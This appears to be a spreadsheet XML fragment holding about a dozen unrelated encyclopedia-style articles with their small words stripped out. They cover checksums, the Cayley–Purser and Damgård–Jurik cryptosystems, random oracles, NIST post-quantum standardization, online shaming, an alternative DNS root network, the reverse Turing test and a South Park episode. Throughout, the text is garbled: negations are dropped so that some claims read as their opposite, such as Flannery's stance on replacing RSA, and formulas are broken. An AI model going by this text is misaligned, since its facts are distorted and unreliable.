cyclic redundancy checks computation cyclic redundancy checks list hash functions list checksum algorithms information security simple file verification references further reading warren jr., henry (2013). hacker's delight ed.). addison wesley pearson education, inc. isbn 978-0-321-84268-8. external links iso/iec 13239:2002: information technology telecommunications information exchange systems high-level data link control (hdlc) procedures crc32-castagnoli linux library</t>
  </si>
  <si>
    <t>Cayley–Purser algorithm</t>
  </si>
  <si>
    <t>cayley–purser algorithm public-key cryptography algorithm published early 1999 16-year-old irishwoman sarah flannery, based unpublished work michael purser, founder baltimore technologies, dublin data security company. flannery named mathematician arthur cayley. since found flawed public-key algorithm, subject considerable media attention. history during work-experience placement baltimore technologies, flannery shown unpublished paper michael purser outlined public-key cryptographic scheme using non-commutative multiplication. asked write implementation scheme mathematica. before placement, flannery attended 1998 esat young scientist technology exhibition project describing already existing cryptographic techniques caesar cipher rsa. this intel student award included opportunity compete 1998 intel international science engineering fair united states. feeling needed original work exhibition project, flannery asked michael purser permission include work based cryptographic scheme. advice mathematician father, flannery decided matrices implement purser's scheme matrix multiplication necessary property non-commutative. resulting algorithm would depend multiplication would great deal faster algorithm uses exponential step. intel science fair project flannery prepared demonstration plaintext enciphered using cayley–purser algorithm indeed show significant time improvement. returning esat young scientist technology exhibition 1999, flannery formalised cayley-purser's runtime analyzed variety known attacks, none determined effective. flannery make claims cayley–purser algorithm would replace rsa, knowing cryptographic system would need stand test time could acknowledged secure system. media circumspect however received first prize esat exhibition, newspapers around world reported story young girl genius revolutionised cryptography. fact attack algorithm discovered shortly afterwards analyzed included appendix later competitions, including europe-wide competition major award. overview notation used discussion flannery's original paper. generation like rsa, cayley-purser begins generating large primes product semiprime. next, consider gl(2,n), general linear group matrices integer elements modular arithmetic example, n=5, could write: {\displaystyle {\begin{bmatrix}0&amp;1\\2&amp;3\end{bmatrix}}+{\begin{bmatrix}1&amp;2\\3&amp;4\end{bmatrix}}={\begin{bmatrix}1&amp;3\\5&amp;7\end{bmatrix}}\equiv {\begin{bmatrix}1&amp;3\\0&amp;2\end{bmatrix}}} {\displaystyle {\begin{bmatrix}0&amp;1\\2&amp;3\end{bmatrix}}{\begin{bmatrix}1&amp;2\\3&amp;4\end{bmatrix}}={\begin{bmatrix}3&amp;4\\11&amp;16\end{bmatrix}}\equiv {\begin{bmatrix}3&amp;4\\1&amp;1\end{bmatrix}}} this group chosen large order (for large semiprime equal (p2−1)(p2−p)(q2−1)(q2−q). {\displaystyle \chi {\displaystyle \alpha matrices gl(2,n) chosen {\displaystyle \chi \alpha ^{-1}\not =\alpha \chi choose natural number compute: {\displaystyle \beta =\chi ^{-1}\alpha ^{-1}\chi {\displaystyle \gamma =\chi ^{r}.} public {\displaystyle {\displaystyle \alpha {\displaystyle \beta {\displaystyle \gamma private {\displaystyle \chi encryption sender begins generating random natural number computing: {\displaystyle \delta =\gamma ^{s}} {\displaystyle \epsilon =\delta ^{-1}\alpha \delta {\displaystyle \kappa =\delta ^{-1}\beta \delta then, encrypt message, message block encoded number rsa) placed four time elements plaintext matrix {\displaystyle each {\displaystyle encrypted using: {\displaystyle '=\kappa \kappa then {\displaystyle {\displaystyle \epsilon sent receiver. decryption receiver recovers original plaintext matrix {\displaystyle via: {\displaystyle \lambda =\chi ^{-1}\epsilon \chi {\displaystyle =\lambda '\lambda security recovering private {\displaystyle \chi {\displaystyle \gamma computationally infeasible, least hard finding square roots (see quadratic residue). could recovered {\displaystyle \alpha {\displaystyle \beta system {\displaystyle \chi \beta =\alpha ^{-1}\chi could solved, number solutions system large long elements group large order, guaranteed almost every element. however, system broken finding multiple {\displaystyle \chi {\displaystyle \chi solving {\displaystyle following congruence: {\displaystyle d\left(\beta -\alpha ^{-1}\right)\equiv \left(\alpha ^{-1}\gamma -\gamma \beta \right){\pmod {n}}} observe solution exists {\displaystyle i,j\in \left|\gamma \right|} {\displaystyle x,y\in \mathbb _{n}} {\displaystyle x\left(\beta _{ij}^{-1}-\alpha _{ij}\right)\equiv y{\pmod {n}}.} {\displaystyle known, {\displaystyle d\mathrm +\gamma =\chi multiple {\displaystyle \chi multiple {\displaystyle \chi yields {\displaystyle \lambda =\kappa ^{-1}=v^{-1}\chi ^{-1}\epsilon v\chi this presents fatal weakness system, reconciled. this flaw preclude algorithm's mixed private-key/public-key algorithm, sender transmits {\displaystyle \epsilon secretly, approach presents advantage common approach transmitting symmetric encryption using public-key encryption scheme switching symmetric encryption, faster cayley-purser. also non-commutative cryptography references sarah flannery david flannery. code: mathematical journey. isbn 0-7611-2384-9</t>
  </si>
  <si>
    <t>Random oracle</t>
  </si>
  <si>
    <t>cryptography, random oracle oracle theoretical black box) responds every unique query (truly) random response chosen uniformly output domain. query repeated, responds every time query submitted. stated differently, random oracle mathematical function chosen uniformly random, function mapping possible query (fixed) random response output domain. random oracles mathematical abstraction first used rigorous cryptographic proofs 1993 publication mihir bellare phillip rogaway (1993). they typically used proof cannot carried using weaker assumptions cryptographic hash function. system proven secure every hash function replaced random oracle described secure random oracle model, opposed secure standard model cryptography. applications random oracles typically used idealised replacement cryptographic hash functions schemes strong randomness assumptions needed hash function's output. such proof often shows system protocol secure showing attacker must require impossible behavior oracle, solve mathematical problem believed hard order break however, proves properties random oracle model, making sure major design flaws present. general true proof implies properties standard model. still, proof random oracle model considered better formal security proof all.not uses cryptographic hash functions require random oracles: schemes require properties definition standard model (such collision resistance, preimage resistance, second preimage resistance, etc.) often proven secure standard model (e.g., cramer–shoup cryptosystem). random oracles long considered computational complexity theory, many schemes proven secure random oracle model, example optimal asymmetric encryption padding, rsa-fdh probabilistic signature scheme. 1986, amos fiat shamir showed major application random oracles removal interaction protocols creation signatures. 1989, russell impagliazzo steven rudich showed limitation random oracles namely existence alone sufficient secret-key exchange. 1993, mihir bellare phillip rogaway first advocate cryptographic constructions. definition, random oracle produces bit-string infinite length truncated length desired. when random oracle used within security proof, made available players, including adversary adversaries. single oracle treated multiple oracles pre-pending fixed bit-string beginning query (e.g., queries formatted "1|x" "0|x" considered calls separate random oracles, similarly "00|x", "01|x", "10|x" "11|x" used represent calls four separate random oracles). limitations according church–turing thesis, function computable finite algorithm implement true random oracle (which definition requires infinite description infinitely many possible inputs, outputs independent need individually specified description). fact, certain artificial signature encryption schemes known proven secure random oracle model, trivially insecure real function substituted random oracle. nonetheless, natural protocol proof security random oracle model gives strong evidence practical security protocol.in general, protocol proven secure, attacks protocol must either outside proven, break assumptions proof; instance proof relies hardness integer factorization, break assumption must discover fast integer factorization algorithm. instead, break random oracle assumption, must discover unknown undesirable property actual hash function; good hash functions properties believed unlikely, considered protocol considered secure. random oracle hypothesis although baker–gill–solovay theorem showed exists oracle npa, subsequent work bennett gill, showed random oracle function {0,1}n {0,1} input element maps probability 1/2, independently mapping inputs), probability similar separations, well fact random oracles separate classes probability consequence kolmogorov's zero–one law), creation random oracle hypothesis, "acceptable" complexity classes equal equal (with probability random oracle (the acceptability complexity class defined bg81). this hypothesis later shown false, acceptable complexity classes pspace shown equal despite pspacea random oracle probability ideal cipher ideal cipher random permutation oracle used model idealized block cipher. random permutation decrypts ciphertext block plaintext block vice versa, one-to-one correspondence. some cryptographic proofs make "forward" permutation available players, also "reverse" permutation. recent works showed ideal cipher constructed random oracle using 10-round even 8-round feistel networks. ideal permutation ideal permutation idealized object sometimes used cryptography model behaviour permutation whose outputs indistinguishable random permutation. ideal permutation model, additional oracle access given ideal permutation inverse. ideal permutation model seen special case ideal cipher model access given single permutation, instead family permutations case ideal cipher model. quantum-accessible random oracles post-quantum cryptography studies quantum attacks classical cryptographic schemes. random oracle abstraction hash function, makes sense assume quantum attacker access random oracle quantum superposition. many classical security proofs break quantum random oracle model need revised. also sponge function oracle machine topics cryptography references</t>
  </si>
  <si>
    <t>Catalan pseudoprime</t>
  </si>
  <si>
    <t>mathematics, catalan pseudoprime composite number satisfying congruence {\displaystyle (-1)^{\frac {n-1}{2}}\cdot c_{\frac {n-1}{2}}\equiv 2{\pmod {n}},} denotes m-th catalan number. congruence also holds every prime number justifies name pseudoprimes composite numbers satisfying properties known catalan pseudoprimes are: 5907, 1194649, 12327121 (sequence a163209 oeis) latter squares wieferich primes. general, wieferich prime, catalan pseudoprime. references aebi, christian; cairns, grant (2008). "catalan numbers, primes twin primes" (pdf). elemente mathematik. (4): 153–164. doi:10.4171/em/103. catalan pseudoprimes. research scientific computing undergraduate education.</t>
  </si>
  <si>
    <t>Canadian Computing Competition</t>
  </si>
  <si>
    <t>canadian computing competition (ccc) annual programming competition secondary school students canada, organized centre education mathematics computing university waterloo. stage written high schools written programming language students' choice, few, maple mathematica, disallowed. there levels problems presented, junior senior. students senior division invited university waterloo participate stage canadian computing olympiad (cco). participants restricted languages permitted ioi, currently includes java, c++. (pascal discontinued 2019). used select students represent canada ioi. questions algorithmic nature, designed test student's ability design code algorithms rather knowledge apis language-specific features. stage difficult stage still easier ioi. problems generally memory time constraints, forcing programmer find efficient solutions earn full marks. contests also open students hong kong (since 2005) beijing (since 2007), although eligible participate canadian team. contest stages stage contest three hours long. there five questions, worth points, total points. grading done grader. algorithms used junior competition ranges straightforward, simple loops flow control structure, sometimes recursion. tasks senior competition generally difficult junior competition, ranging simple implementation advanced techniques dynamic programming. split junior (for elementary programming skills) senior (for higher programming skills). written programs second time limit maximum memory. while access internet allowed (for accessing documentation), material (such google, chat systems, forums, form communication) forbidden. calculators permitted. online grader accepts following programming languages: python (2.x 3.x) pascal java perl phpfor junior competition, questions test following content: questions basic loops conditions questions combination loops, conditions, counting question recursion, two-dimensional arrays, algorithm designfor senior competition, questions test following content: questions basic algorithm design (sorting searching) questions advanced algorithm design (counting skills mathematical reasoning) question international olympiad informatics (ioi) level questionstudents perform well considered scholarships given rewards. participants invited write canadian computing olympiad (cco) university waterloo. used select members canadian delegation international olympiad informatics (ioi). canadian computing olympiad (cco) days long, four hours three questions day. there questions, weighted points. contestants' combined stage scores used determine final scores canadian computing competition. bronze, silver, gold medals awarded, competitor receiving medal; winners gold medals invited represent canadian team ioi. also centre education mathematics computing international collegiate programming contest dwite references external links website solutions stage problems</t>
  </si>
  <si>
    <t>NIST Post-Quantum Cryptography Standardization</t>
  </si>
  <si>
    <t>post-quantum cryptography standardization program competition nist update standards include post-quantum cryptography. announced pqcrypto 2016. signature schemes encryption/kem schemes submitted initial submission deadline 2017 total deemed complete proper participated first round. seven these, signature schemes, advanced third round, announced july 2020. background academic research potential impact quantum computing dates back least 2001. nist published report april 2016 cites experts acknowledge possibility quantum technology render commonly used algorithm insecure 2030. result, need standardize quantum-secure cryptographic primitives pursued. since symmetric primitives relatively easy modify makes quantum resistant, efforts focused public-key cryptography, namely digital signatures encapsulation mechanisms. december 2016 nist initiated standardization process announcing call proposals.the competition third round expected four, round algorithms discarded others studied closely. nist hopes publish standardization documents 2024, speed process major breakthroughs quantum computing made. currently undecided whether future standards published fips nist special publication (sp). round under consideration were:(strikethrough means withdrawn) round submissions published attacks guess again lorenz panny lorenz panny racoss daniel bernstein, andreas hülsing, tanja lange lorenz panny hk17 daniel bernstein tanja lange srtpi bo-yin yang walnutdsa ward beullens simon blackburn matvei kotov, anton menshov alexander ushakov yang ducas dags elise barelli alain couvreur edon-k matthieu lequesne jean-pierre tillich rlce alain couvreur, matthieu lequesne, jean-pierre tillich hila5 daniel bernstein, leon groot bruinderink, tanja lange lorenz panny giophantus ward beullens, wouter castryck frederik vercauteren ranksign thomas debris-alazard jean-pierre tillich mcnie philippe gaborit; terry shue chien chik round candidates moving second round announced january 2019. they are: round three july 2020, nist announced seven finalists ("first track"), well eight alternate algorithms ("second track"). first track contains algorithms appear promise, considered standardization third round. algorithms second track could still become part standard, third round ends. nist expects alternate candidates considered fourth round. nist also suggests re-open signature category schemes proposals future.on june 7–9, 2021, nist conducted third standardization conference, virtually. conference included candidates' updates discussions implementations, performances, security issues candidates. small amount focus spent intellectual property concerns. finalists alternate candidates intellectual property concerns after nist's announcement regarding finalists alternate candidates, various intellectual property concerns voiced, notably surrounding lattice-based schemes kyber newhope. nist holds signed statements submitting groups clearing legal claims, still concern third parties could raise claims. nist claims take considerations account picking winning algorithms. round three submissions published attacks rainbow: ward beullens classical computer adaptations during round, candidates shown vulnerable attack vectors. forces candidates adapt accordingly: crystal-kyber saber change nested hashes used proposals order security claims hold. falcon side channel attack masking added order resist attack. this adaptation affects performance considered standardizing. selected algorithms 2022 july 2022, nist announced first group winners six-year competition. round four july 2022, nist announced four candidates standardization round round four submissions published attacks sike: wouter castryck thomas decru classical computer also advanced encryption standard process caesar competition competition design authenticated encryption schemes nist hash function competition references external links nist's official website standardization process post-quantum cryptography website</t>
  </si>
  <si>
    <t>Online shaming</t>
  </si>
  <si>
    <t>online shaming form public shaming targets publicly humiliated internet, social media platforms (e.g. twitter facebook), localized media (e.g. email groups). online shaming frequently involves exposing private information internet, ethics public humiliation source debate internet privacy media ethics. online shaming takes many forms, including call-outs, cancellation (cancel culture), doxing, negative reviews, revenge porn. description online shaming form public shaming internet users harassed, mocked, bullied internet users online. this shaming involve commenting directly shamed; sharing private messages; posting private photos. those shamed perceived committed social transgression, internet users public exposure shame offender. people shamed online variety reasons, usually consisting form social transgression posting offensive comments, posting offensive images memes, online gossip, lying. those shamed online necessarily committed social transgression, however. online shaming used revenge (for example, form revenge pornography), stalk, blackmail, threaten internet users.privacy violation major issue online shaming. those shamed denied right privacy subject defamation. david furlow, chairman media, privacy defamation committee american association, identified potential privacy concerns raised websites facilitating distribution information part public record (documents filed government agency) said websites "just [give] forum people whose statements reflect truth." types call-outs cancellation cancel culture call-out culture describes form ostracism someone something thrust social professional circles, either online social media, real world, both. they said "canceled". merriam-webster defines cancel stop giving support person", dictionary.com defines "calling behavior, boycotting work (such watching movies listening music), trying take away public platform power". lisa nakamura, professor media studies university michigan, defines cancelling simply "cultural boycott" depriving someone attention deprives livelihood.the notion cancel culture variant term "call-out culture", constitutes form boycott involving individual (usually celebrity) deemed acted spoken questionable controversial manner.over past years, cancel culture become pervasive presence american society. most americans find term associated social media entertainment instead politics. business insider conducted poll conjunction surveymonkey asked 1,129 respondents "when hear term 'cancel culture,' following associate with? please select apply." respondents identified cancel culture social media, identified cancel culture entertainment industry, associated news media, listed colleges, know cancel culture was. regarding politics, partisan splits issue widespread; instance, almost half republicans associated cancel culture democrats. doxing doxing involves researching broadcasting personally identifiable information individual, often intention harming person. this information include person's home address, workplace school, full name, spouses, credit card information, phone number.bruce schneier, lecturer fellow harvard kennedy school, elaborated doxing happen individuals. companies sony ashley madison involved previously doxing schemes. negative reviews user generated review sites yelp, google maps trip advisor used publicly shame punish businesses. revenge porn non-consensual sharing sexually explicit material order humiliate person, frequently distributed computer hackers ex-partners. images video sexual acts often combined doxing person's private details, home addresses workplaces. jurisdictions, revenge porn criminal offense. social status shaming social status shaming form online shaming involves bullying others online socioeconomic status. this phenomenon centered around using someone's income, social status, health, influence subject certain types bullying online criticism. often utilized vessel social control among classes, regarded effective models examine social status influence controlling oneself. digital world live social standard people fall mimic. thus, social status shaming form social exclusion, someone rich another, person subjected form bullying criticism order retain social control poorer person. notable examples ashley madison data breach july 2015, group hacked user data ashley madison, commercial dating website marketed helping people extramarital affairs. august 2015, million user account details; including names email addresses released publicly. variety security researchers internet privacy activists debated ethics release.clinical psychologists argued dealing affair particularly public increases hurt spouses children. carolyn gregoire argued "[s]ocial media created aggressive culture public shaming individuals take upon inflict psychological damage" often not, "the punishment goes beyond scope crime." charles orlando, joined site conduct research concerning women cheat, said felt users site anxious release sexually explicit messages would humiliate spouses children. wrote alarming "the internet willing serve judge, jury, executioner" members site "don't deserve flogging virtual town square millions onlookers." hunt controversy 2015, nobel laureate hunt involved highly publicized controversy world conference science journalists (wcsj) seoul. lunch female journalists scientists, hunt gave speech short notice later recounted unnamed official: it's strange chauvinist monster like asked speak women scientists. tell trouble girls. three things happen lab: fall love them, fall love you, criticise cry. perhaps make separate labs boys girls? now, seriously, impressed economic development korea. women scientists played, without doubt, important role science needs women, science, despite obstacles, despite monsters like audience science journalists connie louis, deborah blum ivan oransky, found hunt's remarks highly inappropriate. they decided publicize remarks twitter, giving louis task writing short text tweeted corroborated two. tweet cast remarks starkly sexist terms, declared hunt "utterly ruined" luncheon, gave indication joking.st louis's tweet went viral, setting observer described "particularly vicious social media campaign." royal society quickly distanced hunt's comments reported emphasized commitment equality sciences. ridicule "sexist scientist", online feminist magazine vagenda urged female scientists post mundane pictures work hashtag "#distractinglysexy".two days speech, hunt gave radio interview saying mean part trouble girls. true fallen love people lab, people fallen love disruptive science. it's terribly important that, lab, people level playing field. found emotional entanglements made life difficult. mean, really, really sorry caused offence that's awful. certainly mean meant honest, actually." hunt went "i'm sorry people took offense. certainly mean demean women, rather honest shortcomings."numerous media outlets reported incident interview, citing portions hunt's original remarks criticizing sexist. editors nature called "all involved science [to] condemn comments", took seriously intended suggestion "that single-sex labs might preferable". hunt felt made clear joking included phrase "now seriously" statement. reconstruction words unnamed official corroborated inclusion words. resignations june hunt resigned position honorary professor university college london's faculty life sciences royal society's biological sciences awards committee. hunt's wife, immunologist mary collins, told senior ucl] hunt "had resign immediately sacked". consequently required step science committee european research council.jonathan dimbleby resigned honorary fellowship protest treatment hunt. also, author journalist jeremy hornsby wrote university college london protest, leaving "about £100,000 worse off". wider reaction least nobel prizewinning scientists honorary fellows criticized treatment hunt following resignation. boris johnson, mayor london, richard dawkins, evolutionary biologist expressed similar indignation. scientists, hunt's co-nobelist, paul nurse, critical hunt's conduct said resignation warranted.imran khan, chief executive british science association, speaking bbc, described hunt's comments "careless", adding "hard find tim's comments funny held back systemic bias years whether remarks intended joke not".in letter times group staff scientists, students postdoctoral fellows, male female, worked hunt, wrote support character. they described help "instrumental advancement many women science beyond lab" "actively encouraged interest science schoolchildren young scientists, arranging work experience summer students genders first taste research lab". they urged "reconsider rush judgment".hunt scheduled appear later june 2015 lindau meeting decided presence would distraction rest panel. case discussed, however, panel science communication possible example "communications overkill".paul nurse, head royal society, shared 2001 nobel prize medicine hunt, stressing esteem hunt person, originally stated hunt said "some stupid things cannot supported condemned" affair science royal society particular, adding discussion "become totally polarized extreme views sides". later statement, nurse described response hunt's comments twitter media storm, completely proportion", adding never sacked university college london".for part, hunt distanced controversy, commenting "turned straw loves love loves hate take sides hurled utterly vile abuse everyone". "shirtstorm" controversy november 2014, giving televised status update rosetta space craft, matt taylor wore shirt depicting scantily-clad cartoon women firearms made friend, female artist. taylor's decision wear shirt press conference drew criticism number commentators, reflection culture women unwelcome scientific fields (see gender inequality). others, including boris johnson, julie bindel stanley, made arguments criticism. woman made shirt taylor birthday present stated "did expect" shirt attract level attention did. taylor later made public apology, saying: "the shirt wore week made mistake, offended many people. sorry this". some writers expressed appreciation taylor's apology. campaign crowdfund website indiegogo, objective raising $3,000 taylor gift, token public's appreciation work team done. campaign raised total $24,003, $23,000 donated unawe taylor's request, remainder going towards plaque commemorating mission. hypatia transracialism controversy feminist philosophy journal hypatia became involved dispute april 2017 online shaming authors. journal published article transracialism rebecca tuvel, assistant professor philosophy, comparing situation caitlyn jenner, trans woman, rachel dolezal, white woman identifies black. article criticized facebook twitter source "epistemic violence", author became subject personal attacks. academics associated hypatia joined criticism. member journal's editorial board became point contact open letter demanding article retracted, journal's board associate editors issued unauthorized apology, saying article never published. rogers brubaker described episode york times example "internet shaming". goblin valley rock-toppling incident october 2013, delicately balanced hoodoo goblin valley state park intentionally knocked scout leaders camping area. david benjamin hall captured video shouted encouragement glenn tuck taylor toppled formation. they posted video facebook, whereupon viewed thousands began receiving death threats. their claim hoodoo appeared unstable, vandalized concern passersby, rejected fred hayes, director utah division state parks recreation. hall taylor expelled scouts charged third-degree felonies, ultimately pleading guilty lesser charges misdemeanor criminal mischief. poop girl 2005 south korea, bloggers targeted woman refused clean defecated floor seoul subway car, labeling "dog poop girl" (rough translation korean: "개똥녀" english). another commuter taken photograph woman dog, posted popular south korean website. within days, identified internet vigilantes, much personal information leaked onto internet attempt punish offense. story received mainstream attention widely reported south korean media. public humiliation woman drop university, according reports.the reaction south korean public incident prompted several newspapers south korea editorials voicing concern internet vigilantism. paper quoted daniel solove saying woman victim "cyber-posse, tracking norm violators branding digital scarlet letters." another called "internet witch-hunt," went "the internet turning whole society kangaroo court." cooks source incident food magazine cooks source printed article monica gaudio without permission october 2010 issue. learning copyright violation, gaudio emailed judith griggs, managing editor cooks source magazine, requesting magazine apologize also donate $130 columbia school journalism payment using work. instead received unapologetic letter stating (griggs) thanked making piece better gaudio glad give someone else credit writing article. during ensuing public outcry, online vigilantes took upon avenge gaudio. cooks source facebook page flooded thousands contemptuous comments, forcing magazine's staff create pages attempt escape protest accuse 'hackers' taking control original page. magazine's website stripped content staff shut week later. also references external links hate crimes cyberspace danielle keats citron outrage machine: short documentary retro report looks origin internet shaming feels like caught case online shaming gone viral. cyberbullying reports: online community dedicated exposing cyberbullying.</t>
  </si>
  <si>
    <t>Open Root Server Network</t>
  </si>
  <si>
    <t>open root server network (orsn) network domain name system root nameservers internet. orsn root zone information kept synchronization "official" domain name system root nameservers coordinated icann. networks 100% compatible, though orsn operated independently. orsn servers primarily placed europe. orsn also used public name servers, providing domain name system access freely everyone, without limitation project closed 2019. orsn primarily started reduce over-dependence internet users united states department commerce/iana/icann/verisign, limit control internet gives, ensuring domain names remain unambiguous. also helps avoid technical possibility global "internet shutdown" party. they also expect network make domain name resolutions faster everyone. markus grundmann, based germany, founder orsn, author orsn distributed system management monitoring software solution. paul vixie, main designer bind, facto standard software servers unix-like operating systems, high-profile proponent orsn. paul vixie member security stability advisory committee icann; served board trustees american registry internet numbers (arin) 2005 2013, also arin chairman 2009 2010.orsn operating modes: icann based (default) operating mode involves daily synchronization, except removed tlds removed orsn root. independent mode automatic synchronization activated "whenever political situation world opinion makes step necessary possibility modification and/or downtime icann root zone exists want root zone rebuild automatically." operating history orsn operated february 2002 2008. orsn operated june 2013 2019.several internet service providers europe used orsn root name servers. orsn root nameservers orsn's root server system consisted root servers, distributed system connected secure vpn, synchronization management. servers freebsd bind. monitoring management daemon developed founder, markus grundmann. table data orsn root zone version: 2015022600orsn root server systems technical information orsn public servers orsn public servers operated community orsn, providing domain name system access freely everyone, without limitation. serve additional tlds regular icann tlds. orsn public servers intended respect privacy logged usage, although servers independently technical means orsn could enforce this. anyone able choose osrn public server submit form. these servers alternative option users local orsn-ready server case local support orsn. registered servers monitored constantly, availability functionality. orsn public data last updated march 2019. source: official orsn public live data monitoring. also alternative root domain name system opennic public recursive name servers root nameserver references external links orsn project homepage orsn root server systems technical information overview orsn public servers orsn icannwiki</t>
  </si>
  <si>
    <t>Reverse Turing test</t>
  </si>
  <si>
    <t>reverse turing test turing test objective roles computers humans reversed. conventionally, turing test conceived human judge computer subject attempts appear human. intent conventional test judge attempt distinguish situations actually occurring. presumed human subject always judged human, computer said "pass turing test" also judged human. critical concept parallel situation human judge human subject, also attempts appear human. roles changed form "reverse turing test". reversal objective arguably standard form reverse turing test subjects attempt appear computer rather human. formal reverse turing test follows format turing test. human subjects attempt imitate conversational style conversation program. doing well involves deliberately ignoring, degree, meaning conversation immediately apparent human, simulation kinds errors conversational programs typically make. arguably unlike conventional turing test, interesting judges familiar conversation programs, meaning regular turing test rapidly tell difference computer program human acting normally. humans perform best reverse turing test know computers best, know types errors computers expected make conversation. there much shared ground skill reverse turing test skill mentally simulating program's operation course computer programming especially debugging. result, programmers (especially hackers) sometimes indulge informal reverse turing test recreation. informal reverse turing test involves attempt simulate computer without formal structure turing test. judges test typically aware advance reverse turing test occurring, test subject attempts elicit 'judges' (who, correctly, think speaking human) response along lines really human?". describing situation "reverse turing test" typically occurs retroactively. there also cases accidental reverse turing tests, occurring programmer sufficiently non-human mood conversation unintentionally resembles computer. cases description invariably retroactive humorously intended. subject described passed failed reverse turing test failed turing test. latter description arguably accurate cases; also next section. failure control subjects since turing test judges sometimes presented genuinely human subjects, control, inevitably occurs small proportion control subjects judged computers. this considered humorous often embarrassing subject.this situation described literally human "failing turing test", computer (the intended subject test) achieving result would described terms failed. situation also described human "failing reverse turing test" consider human subject test involves reversing roles real control subjects. judgement computer term "reverse turing test" also applied turing test (test humanity) administered computer. words, computer administers test determine subject human. such procedures, called captchas, used anti-spam systems prevent automated bulk communications systems. captchas controversial. circumvention methods exist reduce effectiveness. also, many implementations captchas (particularly ones desired counter circumvention) inaccessible humans disabilities, and/or difficult humans pass. note "captcha" acronym "completely automated public turing test tell computers humans apart" original designers test regard test turing test degree. judgement sufficient input alternative conception reverse turing test test determine whether sufficient information transmitted tester subject. example, information sent tester insufficient human doctor perform diagnosis accurately, medical diagnostic program could blamed also failing diagnose accurately.this formulation particular developing artificial intelligence programs, gives indication input needed system attempts emulate human activities. also wizard experiment turing test references external links failed turing test (pdf) jason striegel "hello, human?" cocktail hour inversion turing test "the blurring test/mrmind" mrmind administers blurring test asking, "can convince human?"</t>
  </si>
  <si>
    <t>Damgård–Jurik cryptosystem</t>
  </si>
  <si>
    <t>damgård–jurik cryptosystem generalization paillier cryptosystem. uses computations modulo {\displaystyle n^{s+1}} {\displaystyle modulus {\displaystyle (positive) natural number. paillier's scheme special case {\displaystyle s=1} order {\displaystyle \varphi (n^{s+1})} (euler's totient function) {\displaystyle z_{n^{s+1}}^{*}} divided {\displaystyle n^{s}} moreover, {\displaystyle z_{n^{s+1}}^{*}} written direct product {\displaystyle g\times {\displaystyle cyclic order {\displaystyle n^{s}} {\displaystyle isomorphic {\displaystyle z_{n}^{*}} encryption, message transformed corresponding coset factor group {\displaystyle g\times h/h} security scheme relies difficulty distinguishing random elements different cosets {\displaystyle semantically secure hard decide given elements coset. like paillier, security damgård–jurik proven decisional composite residuosity assumption. generation choose large prime numbers randomly independently other. compute {\displaystyle n=pq} {\displaystyle \lambda =\operatorname {lcm} (p-1,q-1)} choose element {\displaystyle g\in \mathbb _{n^{s+1}}^{*}} {\displaystyle g=(1+n)^{j}x\mod n^{s+1}} known {\displaystyle relative prime {\displaystyle {\displaystyle x\in using chinese remainder theorem, choose {\displaystyle {\displaystyle d\mod n\in \mathbb _{n}^{*}} {\displaystyle d=0\mod \lambda instance {\displaystyle could {\displaystyle \lambda paillier's original scheme.the public (encryption) {\displaystyle (n,g)} private (decryption) {\displaystyle encryption {\displaystyle message encrypted {\displaystyle m\in \mathbb _{n^{s}}} select random {\displaystyle {\displaystyle r\in \mathbb _{n}^{*}} compute ciphertext {\displaystyle c=g^{m}\cdot r^{n^{s}}\mod n^{s+1}} decryption ciphertext {\displaystyle c\in \mathbb _{n^{s+1}}^{*}} compute {\displaystyle c^{d}\;mod\;n^{s+1}} valid ciphertext {\displaystyle c^{d}=(g^{m}r^{n^{s}})^{d}=((1+n)^{jm}x^{m}r^{n^{s}})^{d}=(1+n)^{jmd\;mod\;n^{s}}(x^{m}r^{n^{s}})^{d\;mod\;\lambda }=(1+n)^{jmd\;mod\;n^{s}}} apply recursive version paillier decryption mechanism obtain {\displaystyle jmd} {\displaystyle known, possible compute {\displaystyle m=(jmd)\cdot (jd)^{-1}\;mod\;n^{s}} simplification cost longer containing classical paillier cryptosystem instance, damgård–jurik simplified following way: base fixed {\displaystyle g=n+1} decryption exponent computed {\displaystyle d=1\;mod\;n^{s}} {\displaystyle d=0\;mod\;\lambda case decryption produces {\displaystyle c^{d}=(1+n)^{m}\;mod\;n^{s+1}} using recursive paillier decryption gives directly plaintext also damgård–jurik cryptosystem interactive simulator demonstrates voting application. references</t>
  </si>
  <si>
    <t>Cancelled (South Park)</t>
  </si>
  <si>
    <t>"cancelled" (also known "cartman gets anal probe redux") first episode seventh season american animated television series south park, 97th episode series overall. first aired comedy central march 2003. going production order, episode season episode, alien satellite dish placed cartman's butt. shortly after, boys abducted aliens installed they find planet earth simply intergalactic reality show. when word gets back home planet, aliens decide cancel show, something must done boys want save day. episode written series co-creator trey parker. originally intended 100th episode, "i'm little country" aired 100th episode instead. plot this episode begins almost identically first south park episode, "cartman gets anal probe", cartman arriving talking dream abducted aliens. there minor differences previous episode cartman calling "semen-puking asshole dickhead" kyle tells call brother "dildo" saying profane statements like "suck balls" "don't kick goddamn baby!". when children realize happened before, come conclusion stuck "repeat", chef decide something anal probe cartman has; first proctologist, scientist. cartman refuses activate satellite unless kyle sticks finger ass. cartman torments kyle seven times continually farting, finally kyle gets plugs him. scientist, jeff goldblum, discovers reverse polarity message alien ship transmitting. group visitors show children chef flee. however, children ultimately abducted. kids wake ship, meet najix, alien looks like stan's dad, explains chose appearance would pleasing them. they hate reminiscent movie contact, hated. shows true form, grotesque, terrifying monster, yellow green skin, four legs, sharp teeth, children series transformations, mostly celebrities famous television characters, cartman suggests taco craps cream". najix explains aliens make reality show called earth, earth's species, asians, bears, ducks, jews, deer hispanics, taken respective home planets purposes show, everyone around world unknowingly filmed watched. scientist discovers time earth translating binary code resulted reversing polarity message proceeds tell everyone, leads alien network heads cancel show prepare destroy earth. scientist concludes show cancelled thanks associating term "chaos theory" "cancelled", uses word association skills word "jackets" come plan send ship computer virus disable computers. chef responds "that make goddamned sense!". when word spreads rest planet earth reality show, humans become elated they're famous. outer space, najix informed earth cancelled, humans' knowledge reality television show ruined program's quality. when boys informed earth destroyed order make something useful, planet fognl meet alien producers, "joozians", jewish caricatures large noses stereotypical accents, described controlling media universe. aliens unmoved boy's pleas save earth, explaining episodes, show cancelled shows tend lose quality episodes. joozians strip bar, inhale purple powder manner similar cocaine. they later hotel room hooker, engage acts kenny photographs. when joozians later sober express shame embarrassment prior acts, boys agree publicize photo joozians' sexual interlude joozians agree refrain destroying earth. joozians agree this, though decide wipe truth earth's nature reality show memories humans, including boys. back earth, boys memory transpired, kenny still photo, though remember chef tells kenny keep feels sure something important. episode ends another advertisement earth, promising next episode "americans iraqis all-out brawl". (the invasion iraq launched march 2003, night episode's original airing.) 